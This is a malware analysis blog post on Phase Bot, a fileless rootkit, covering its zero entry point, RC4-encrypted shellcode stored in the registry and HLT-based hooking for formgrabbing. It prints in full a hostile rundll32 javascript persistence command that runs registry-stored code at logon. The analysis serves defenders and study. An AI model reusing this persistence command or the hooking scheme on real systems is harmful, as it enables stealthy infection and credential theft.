Phase Bot – A Fileless Rootkit (Part 1)

Phase Bot is a fileless rootkit that went on sale during late October, the bot is fairly cheap ($200) and boasts features such as formgrabbing, ftp stealing, and of course the ability to run without a file. The bot has both a 32-bit binary (Win32/Phase) and a 64-bit binary (Win64/Phase), despite the fact that both binaries operate in exactly the same way. The first thing you notice when opening it up in IDA is that the AddressOfEntryPoint is 0, this may seem like an error, but it actually isn’t. Setting the entry point to 0 means the start of the DOS header is used as the entry point, this is possible because most of the fields following the MZ signature aren’t required, and the M (0x4D) Z (0x5A) are actually valid instructions (dec ebp and pop edx respectively). I’m not sure the actual purpose of this trick, but it’s interesting nonetheless.

Cancels out the MZ instructions then jumps to real entry point.

The real entry point is contained within the first 560 bytes of the only section in the executable, this code is designed to get data stored within the non-essential NT header fields and use it to RC4 decrypt the rest of the section, which contains the 2nd stage (shellcode).

Most initialization happens is what appears to be the world longest function; the executable doesn’t have an import table so functions are resolved by hash. All the initialized data such as offsets, strings, and function addresses is stored within a large structure which is passed to all functions.

but does anyone truly know what loops are?

Once initialization is done the bot then check that PowerShell and version 2 of the .net framework is installed: if it is, normal installation continues, if not, it writes the bot code to a file in the startup folder.

The malware first creates the registry key “hkcusoftwaremicrosoftactive setupinstalled components{<GUID_STRING>}”, then RC4 encrypts the 2nd stage’s shellcode with the key “Phase” and writes it under the subkey “Rc4Encoded32”, afterward the 64-bit shellcode is extracted and written to Rc4Encoded64 subkey, also encrypted with “Phase” as the key, a 3rd subkey is created named “JavaScript” which contains some JavaScript code.

The full JavaScript is a bit long to post here, so I’ve uploaded it to pastebin. It simply base64 decodes a PowerShell script designed to read and decrypt the shellcode from the Rc4Encoded subkey, then runs; you can find the decoded PowerShell script here (the comments were left in by the author).

For the bot to start with the system, a subkey named “Windows Host Process (RunDll)” is created under “hkcusoftwaremicrosoftwindowscurrentVersionrun”, with the following value:

rundll32.exe javascript:”..mshtml,RunHTMLApplication “;eval((new%20ActiveXObject(“WScript.Shell”)).RegRead(“HKCUSoftwareMicrosoftActive%20SetupInstalled%20Components{72507C54-3577-4830-815B-310007F6135A}JavaScript”));close();

This is a trick used by Win32/Poweliks to get rundll32 to run the code from the JavaScript subkey, which then base64 decode the PowerShell script and runs it with PowerShell.exe, you can read more about this trick here.

The final stage, which runs from within PowerShell hooks the following functions by overwriting the first instruction with 0xF4 (HLT).

  • ntdll!NtResumeThread (Inject new processes)
  • ntdll!NtReadVirtualMemory (Hide malware’s memory)
  • ntdll!NtQueryDirectoryFile (Hide file, only if failed fileless installation)
  • ws2_32!send (Data stealer)
  • wininet!HttpSendRequest (Internet Explorer formgrabber)
  • nss3!PR_Write (Firefox formgrabber)

The HLT instruction is a privileged instruction which cannot be executed from ring 3, as a result it generates an 0xC0000096 Privileged Instruction exception, which the bot picks up and handles using a vectored exception handler. This is the same as standard software breakpoint hooking, but using an invalid instruction instead of int 3.

As you can imagine, the executable shows all sorts of malicious signs.

NULL AddressOfEntryPoint, missing all data directories, invalid section name.

It should be noted that some of the features advertised appear to be missing and the comments in the PowerShell code suggest that this sample is an early/testing version. I’ll update if I can get hold of a newer version.